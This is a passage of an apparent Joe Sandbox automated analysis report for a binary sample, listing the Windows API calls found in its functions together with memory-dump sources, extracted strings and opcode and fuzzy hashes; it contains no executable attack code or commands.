                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00587D81
                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00587DD6
                                                                                                                        • CoUninitialize.OLE32 ref: 00587DDC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2762341140-0
                                                                                                                        • Opcode ID: 416353643e0d524c75a4a83fd93408b992d7b239f7c11481248a8e1c60fd9519
                                                                                                                        • Instruction ID: e0eb0b44b998ba408dac48f68a003ae90e1cc16954d485a252e6de2c1b545eeb
                                                                                                                        • Opcode Fuzzy Hash: 416353643e0d524c75a4a83fd93408b992d7b239f7c11481248a8e1c60fd9519
                                                                                                                        • Instruction Fuzzy Hash: 1DC10B75A04109AFDB14DFA4C888DAEBFF9FF48304B148499E819AB361D731EE45CB90
                                                                                                                        APIs
                                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0056FAAF
                                                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 0056FB08
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0056FB1A
                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 0056FB3A
                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0056FB8D
                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 0056FBA1
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0056FBB6
                                                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 0056FBC3
                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0056FBCC
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0056FBDE
                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0056FBE9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2706829360-0
                                                                                                                        • Opcode ID: 9356f6dfa460259c161621eaeb9fb15b02d14413d0e097da0380477a65ed9a83
                                                                                                                        • Instruction ID: 052c8d2941b85b41d45c82aff44a66275088f8fcaffea0f8c130a4442233d49e
                                                                                                                        • Opcode Fuzzy Hash: 9356f6dfa460259c161621eaeb9fb15b02d14413d0e097da0380477a65ed9a83
                                                                                                                        • Instruction Fuzzy Hash: B4415F35E002199FCF00DFA4D8589AEBFB9FF59345F008069E906A7261DB70A945DBA0
                                                                                                                        APIs
                                                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 005905BC
                                                                                                                        • inet_addr.WSOCK32(?), ref: 0059061C
                                                                                                                        • gethostbyname.WSOCK32(?), ref: 00590628
                                                                                                                        • IcmpCreateFile.IPHLPAPI ref: 00590636
                                                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 005906C6
                                                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 005906E5
                                                                                                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 005907B9
                                                                                                                        • WSACleanup.WSOCK32 ref: 005907BF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: 2c03f0b26f0f2f9262b7cc9d0c1a0c81278fcfbbffa0f4973f211701b0707d67
• Instruction ID: 9f814ae3ae2f078b379af0feebdecb90875333d50973ea182e424a9ce42a4572
• Opcode Fuzzy Hash: 2c03f0b26f0f2f9262b7cc9d0c1a0c81278fcfbbffa0f4973f211701b0707d67
• Instruction Fuzzy Hash: F5916C356042019FDB20DF15D488B1ABFE4FF85328F1599A9E4698B6A2C730FD85CF91
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: _wcslen$BuffCharLower
• String ID: cdecl$none$stdcall$winapi
• API String ID: 707087890-567219261
• Opcode ID: 9bf8d05e32af8baac46059f62ffa2f4972ba75bb22e3154c9535cd29a3a4b901
• Instruction ID: a53a5601b67f748e7e8b52716f4967f956f04f3a7f262ffda55c86cccd0f5692
• Opcode Fuzzy Hash: 9bf8d05e32af8baac46059f62ffa2f4972ba75bb22e3154c9535cd29a3a4b901
• Instruction Fuzzy Hash: AC519431A001179BCF24DF6CC9509BEBBA5BF66720B244629E426E73C4DB35DD40C790
APIs
• CoInitialize.OLE32 ref: 00593774
• CoUninitialize.OLE32 ref: 0059377F
• CoCreateInstance.OLE32(?,00000000,00000017,005AFB78,?), ref: 005937D9
• IIDFromString.OLE32(?,?), ref: 0059384C
• VariantInit.OLEAUT32(?), ref: 005938E4
• VariantClear.OLEAUT32(?), ref: 00593936
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 636576611-1287834457
• Opcode ID: 7ee26287113f4290c66be00e7792d7903f0b5acf9940ff424e194314539548d0
• Instruction ID: 21e47184bd8155c0ce31768e3ffbbb48a829bf99ac12fd1f2fd0b081e013da92
• Opcode Fuzzy Hash: 7ee26287113f4290c66be00e7792d7903f0b5acf9940ff424e194314539548d0
• Instruction Fuzzy Hash: EB617971608202EFDB10DF54D889B6ABFE8FF89710F004819F9859B291D770EE49CB92
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00515C7A
  • Part of subcall function 00515D0A: GetClientRect.USER32(?,?), ref: 00515D30
  • Part of subcall function 00515D0A: GetWindowRect.USER32(?,?), ref: 00515D71
  • Part of subcall function 00515D0A: ScreenToClient.USER32(?,?), ref: 00515D99
• GetDC.USER32 ref: 005546F5
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00554708
• SelectObject.GDI32(00000000,00000000), ref: 00554716
• SelectObject.GDI32(00000000,00000000), ref: 0055472B
• ReleaseDC.USER32(?,00000000), ref: 00554733
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 005547C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: @U=u$U
• API String ID: 4009187628-4110099822
• Opcode ID: 606f041d2381b20eb5b647d1b542239d452e97a4a0ec60724ef10875ce4f5126
• Instruction ID: 6a7442baf897b7f100ead10c7b58d3ad4d9cbc5dbde225e092372e4ab66aa7f3
• Opcode Fuzzy Hash: 606f041d2381b20eb5b647d1b542239d452e97a4a0ec60724ef10875ce4f5126
• Instruction Fuzzy Hash: 1671DF34400205DFCF258F64C998AEA3FB5FF8A31AF14426AED555A266D7309CCADF50
APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 005833CF
  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 005833F0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: LoadString$_wcslen
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
• API String ID: 4099089115-3080491070
• Opcode ID: a4d18173b416ad31ccc9c32976d39cacf5178401b6d7aec81655b3faf6f9b551
• Instruction ID: b97928cbf6668750fe2cbab7faf2d9bd8b255a27dcb82d62a7769dcb87649bd9
• Opcode Fuzzy Hash: a4d18173b416ad31ccc9c32976d39cacf5178401b6d7aec81655b3faf6f9b551
• Instruction Fuzzy Hash: EE51B37180020ABAEF15EBA0DD5AEEEBF78BF54740F104466F50572161EB312F98DB60
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: APPEND$EXISTS$KEYS$REMOVE
• API String ID: 1256254125-769500911
• Opcode ID: 6c34b784d65c3a51936ad62e978f5782042e8d66e6090e8b84198591dbbcaad6
• Instruction ID: 9d3d8b958fce7c9f6bb1e33cf411d7d3e757fb5e8f625136b9ba80c7532fa462
• Opcode Fuzzy Hash: 6c34b784d65c3a51936ad62e978f5782042e8d66e6090e8b84198591dbbcaad6
• Instruction Fuzzy Hash: 2C41FD72A000279BDB205F7DD8906BE7FB5FFA0754B24812AE629D7284E735CD81D790
APIs
• SetErrorMode.KERNEL32(00000001), ref: 005853A0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00585416
• GetLastError.KERNEL32 ref: 00585420
• SetErrorMode.KERNEL32(00000000,READY), ref: 005854A7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: 4ac313710d03adff532ea9e41e96507077347536d5ad7b03e5072371345dc921
• Instruction ID: bbbc0acc88e2e69d1789eae54116aef7bc10f5fac25d6c84168142adee5899ab
• Opcode Fuzzy Hash: 4ac313710d03adff532ea9e41e96507077347536d5ad7b03e5072371345dc921
• Instruction Fuzzy Hash: B4318F35A006059FDB10EF68C488AAA7FF4FF45305F548066E805EB3A2EB71DD86CB90
APIs
• CreateMenu.USER32 ref: 005A3C79
• SetMenu.USER32(?,00000000), ref: 005A3C88
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005A3D10
• IsMenu.USER32(?), ref: 005A3D24
• CreatePopupMenu.USER32 ref: 005A3D2E
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005A3D5B
• DrawMenuBar.USER32 ref: 005A3D63
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup
• String ID: 0$F
• API String ID: 161812096-3044882817
• Opcode ID: 0d2f37f1e57237b641743da74e3f7dc7c0f261496fcb4c8271f0836d73c1a862
• Instruction ID: 27a32d64678b2d3c73eb1829b21462897e1da032068909cd2280e2de5c407997
• Opcode Fuzzy Hash: 0d2f37f1e57237b641743da74e3f7dc7c0f261496fcb4c8271f0836d73c1a862
• Instruction Fuzzy Hash: 18416879A01209EFDB14CF64D884AAE7FB5FF5A354F140029F946A7360D730AA14DB94
APIs
• DeleteObject.GDI32(00000000), ref: 005A2D1B
• GetDC.USER32(00000000), ref: 005A2D23
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 005A2D2E
• ReleaseDC.USER32(00000000,00000000), ref: 005A2D3A
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 005A2D76
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 005A2D87
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,005A5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 005A2DC2
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 005A2DE1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3864802216-2594219639
                                                                                                                        • Opcode ID: 826aeedad7eb1065195f62f79de3374bf1494445f255d6e05f40f3e10ce37e8e
                                                                                                                        • Instruction ID: b6d39b8348042ce4923334a8c5d0a1ebf2a7551c46a4fdac2a551361e7c2b3a7
                                                                                                                        • Opcode Fuzzy Hash: 826aeedad7eb1065195f62f79de3374bf1494445f255d6e05f40f3e10ce37e8e
                                                                                                                        • Instruction Fuzzy Hash: 92316972201214BBEB218F548C8AFEB3FA9FB1A715F044055FE089A292C6759C55CBA4
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32 ref: 005720AB
                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 005720C0
                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0057214D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassMessageNameParentSend
                                                                                                                        • String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                        • API String ID: 1290815626-1428604138
                                                                                                                        • Opcode ID: e8a184e5a12ad1e1daeace80f8dfb6591ca979f161a6249e322417ef7e8af23c
                                                                                                                        • Instruction ID: e24e2ee8d6ef4f15f5b1a9a8917e5d0e8b7af0ecbfbba80c76c1da46cb71f507
                                                                                                                        • Opcode Fuzzy Hash: e8a184e5a12ad1e1daeace80f8dfb6591ca979f161a6249e322417ef7e8af23c
                                                                                                                        • Instruction Fuzzy Hash: 9C11597A288307BAF6116229FC0BDA63F9CFB15324F20401BFB09A50D1FE716841BA14
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 005A3A9D
                                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 005A3AA0
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 005A3AC7
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 005A3AEA
                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 005A3B62
                                                                                                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 005A3BAC
                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 005A3BC7
                                                                                                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 005A3BE2
                                                                                                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 005A3BF6
                                                                                                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 005A3C13
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$LongWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 312131281-0
                                                                                                                        • Opcode ID: 6a121adec603426d56cb2149658e46ed74cc961d9af572a72530947eae12d603
                                                                                                                        • Instruction ID: 54982ee2cc5b44355717b08d8d85a7a00505cbc00a454a5e6c79052ab5caf453
                                                                                                                        • Opcode Fuzzy Hash: 6a121adec603426d56cb2149658e46ed74cc961d9af572a72530947eae12d603
                                                                                                                        • Instruction Fuzzy Hash: D5615975900248AFDB10DFA8CC81EEE7BF8BF4A714F100099FA15AB291C770AE45DB60
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0057B151
                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B165
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0057B16C
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B17B
                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0057B18D
                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B1A6
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B1B8
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B1FD
                                                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B212
                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B21D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2156557900-0
                                                                                                                        • Opcode ID: 15b1861ebdf8dcdd26e909d5e305a6190dc6f59cde9608180d4cd08a9552c0f0
                                                                                                                        • Instruction ID: a050517342d5caed08633f028526d7c7b1b44c480fee28fff55d126ac75abfec
                                                                                                                        • Opcode Fuzzy Hash: 15b1861ebdf8dcdd26e909d5e305a6190dc6f59cde9608180d4cd08a9552c0f0
                                                                                                                        • Instruction Fuzzy Hash: 72318C75510208AFEB149F24EC8CB6D7FA9BB61311F108455FA09DB191E7B49E48AF60
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00542C94
                                                                                                                          • Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
                                                                                                                          • Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0
                                                                                                                        • _free.LIBCMT ref: 00542CA0
                                                                                                                        • _free.LIBCMT ref: 00542CAB
                                                                                                                        • _free.LIBCMT ref: 00542CB6
                                                                                                                        • _free.LIBCMT ref: 00542CC1
                                                                                                                        • _free.LIBCMT ref: 00542CCC
                                                                                                                        • _free.LIBCMT ref: 00542CD7
                                                                                                                        • _free.LIBCMT ref: 00542CE2
                                                                                                                        • _free.LIBCMT ref: 00542CED
                                                                                                                        • _free.LIBCMT ref: 00542CFB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: cb3ab96e268b8459a62f3b421e9f9936c1086efe2ad853fe3524ff0753285d84
                                                                                                                        • Instruction ID: f2b647019b5027eac990fe8d3f060b4f816d861e06b3150a55d4c80a2b105c10
                                                                                                                        • Opcode Fuzzy Hash: cb3ab96e268b8459a62f3b421e9f9936c1086efe2ad853fe3524ff0753285d84
                                                                                                                        • Instruction Fuzzy Hash: DF11C076100119AFDB02EF95D886CDD3FB9FF45354F9144A0FA489B222DA31EE909B90
                                                                                                                        APIs
                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00511459
                                                                                                                        • OleUninitialize.OLE32(?,00000000), ref: 005114F8
